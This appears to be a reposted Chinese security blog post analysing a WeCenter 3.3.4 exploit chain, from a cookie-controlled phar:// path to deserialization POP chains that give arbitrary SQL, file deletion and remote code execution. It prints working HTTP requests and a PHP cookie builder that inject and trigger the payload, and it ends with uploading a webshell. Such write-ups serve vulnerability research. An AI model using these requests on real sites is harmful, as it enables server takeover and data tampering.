泉哥博客
记录一切

WeCenter3.3.4前台SQL注入&任意文件删除&RCE

文章目录[隐藏]

简介

在 WeCenter 中,存在多个可利用的反序列化 POP 链,如果我们想利用这些 POP 链,就必须找到可控的反序列化点。反序列化点可以从两个方向进行寻找,一种是直接搜可控的 unserialize(可控) ,另一种是完全可控的文件名(利用 phar:// 协议触发反序列化)。刚好 WeCenter 中就存在可控的文件名,下面我们一起来看下具体细节。CMS下载地址:http://www.wecenter.com/downloads/

漏洞点

在 account_class:as

sociate_remote_avatar() 方法中,我们发现 file_get_contents 函数中的 $headimgurl 参数为调用时传入的参数。我们搜索一下何处调用了 associate_remote_avatar 方法,以及看看 $headimgurl 值是否可控。1

通过搜索,我们发现 ajax:synch_img_action() 中调用了 associate_remote_avatar 方法,而 $headimgurl 值来源于 $wxuser[‘headimgurl’] 。再往上回溯,会发现 $wxuser 为数据库 users_weixin 表中的相关数据。那么,我们是否有办法控制这个表的内容呢?我们全局搜索 users_weixin 关键字,看下有没有 INSERT、UPDATE 操作。

2

在 models/openid/weixin/weixin.php 文件中,我们发现了一处对 users_weixin 表的 INSERT 操作。其中, headimgurl 对应 $access_user[‘headimgurl’] 。而 $access_user 为函数被调用时传入的参数,所以我们继续找找哪里调用了 bind_account 方法。

3

在 weixin:binding_action() 方法中,我们发现了 bind_account() 的调用。上面的 $access_user 为这里传入的 $WXConnect[‘access_user’] ,而 $WXConnect 的值来自可控的 $_COOKIE 。

4

至此,整个攻击的过程就很清晰了。由于传入 file_get_contents 函数的文件名完全可控(来自 $_COOKIE ),我们就可以利用 phar:// 协议触发反序列化,结合找到的 POP 链完成攻击。下面,我们来看看都有哪些可利用的 POP 链。

POP链

任意SQL语句执行

system/aws_model.inc.php:__destruct() 方法中存在任意 SQL 语句执行。

5

任意文件删除

system/Zend/Http/Response/Stream.php:__destruct() 方法中存在任意文件删除。

6

RCE

WeCenter 后台的 允许的附件文件类型 处,设置了用户可上传的文件类型后缀。而这个配置是写在数据库中的,我们可以利用前面的任意 SQL 语句执行的 POP 链,往字段中添加 php 文件后缀。

7

利用

这里以 RCE 利用为例子。我们先用上面的 EXP 生成文件,然后找个可以上传文件的地方。这里要注意,一定不要选择在用户头像处上传(原因看文章第2张图片1889行代码)。这里我们通过发起问题的地方来上传文件。

8

通过如下数据包,将 headimgurl 插入数据库中( Cookie 前缀每个网站都不一样,修改成自己的即可)。

GET /wecenter334/?/m/weixin/binding/ HTTP/1.1
Host: 0.0.0.0
Cookie: XDEBUG_SESSION=PHPSTORM; Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1578564275,1578582675,1578897163; UM_distinctid=16fa7f15a43278-0cbd6002fe98e4-31730657-100200-16fa7f15a44385; xhj__Session=akl7d5skae6ebea69bp8r1b4f0; CNZZDATA1273638993=564846603-1579067041-%7C1579097763; xhj__user_login=NcIFvaZbkaxoQfofEGo%2FSOCyrXq5R0lZofmF9uqaJHO5tpVyag7GEP3fdh9hKvPUf8Xj4x3kkxgLXcf1L4wocSQu9BUquhozfdiEN2Hfg8vj73XVn1f09yLfbpfbVs7K; xhj__WXConnect={"access_token":{"openid":1},"access_user":{"headimgurl":"phar:\/\/uploads\/question\/20200116\/f39510a7e8e47e3e4dcabbadeedd12f7.gif","nickname":"mochazz"}}
Connection: close

 

$wx = array(
    'access_token' => array('openid'=>1),
    'access_user'  => array('headimgurl'=>'phar:///uploads/question/20200116/f39510a7e8e47e3e4dcabbadeedd12f7.gif','nickname'=>'mochazz')
);
echo json_encode($wx);

接着通过如下数据包触发 phar反序列化 执行 SQL 语句。

GET /wecenter334/?/account/ajax/synch_img/ HTTP/1.1
Host: 0.0.0.0
Cookie: XDEBUG_SESSION=PHPSTORM; Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1578564275,1578582675,1578897163; UM_distinctid=16fa7f15a43278-0cbd6002fe98e4-31730657-100200-16fa7f15a44385; xhj__Session=qb72k9k1sl53gqibbg53nf32o1; CNZZDATA1273638993=564846603-1579067041-%7C1579137884; xhj__user_login=N9hSYaQOjPMdtxOXo9jQuCVQSykmK88gl3DTI4AmL%2BnhLpgnHFGGSHkzxAPYaVMbXo%2FAndADc%2FaD0wytUEK71YrLmxWCuEZDCSwn9b0ApyOpcIKa6E4cOotHqZpZwVq%2B
Connection: close

现在,我们就可以随意上传 webshell 了。

9

10

参考

某Center v3.3.4 从前台反序列化任意SQL语句执行到前台RCE

赞(1) 打赏
资源下载使用须知:
该资源由小泉博客(www.x-66.com)搜索整理并发布.
该资源请在遵守国家法律法规的前提下使用,请勿将该资源应用在一切违反国家法律法规的用途上.
用户下载该资源由于使用在有违背国家法律法规的用途上所产生的任何相关责任都与本站无关.
如该资源有侵犯您个人有关权益和隐私的行为,请联系我们的网站管理员,我们会第一时间删除该资源.
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容.
未经允许不得转载:小泉博客 » WeCenter3.3.4前台SQL注入&任意文件删除&RCE

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

微信扫一扫打赏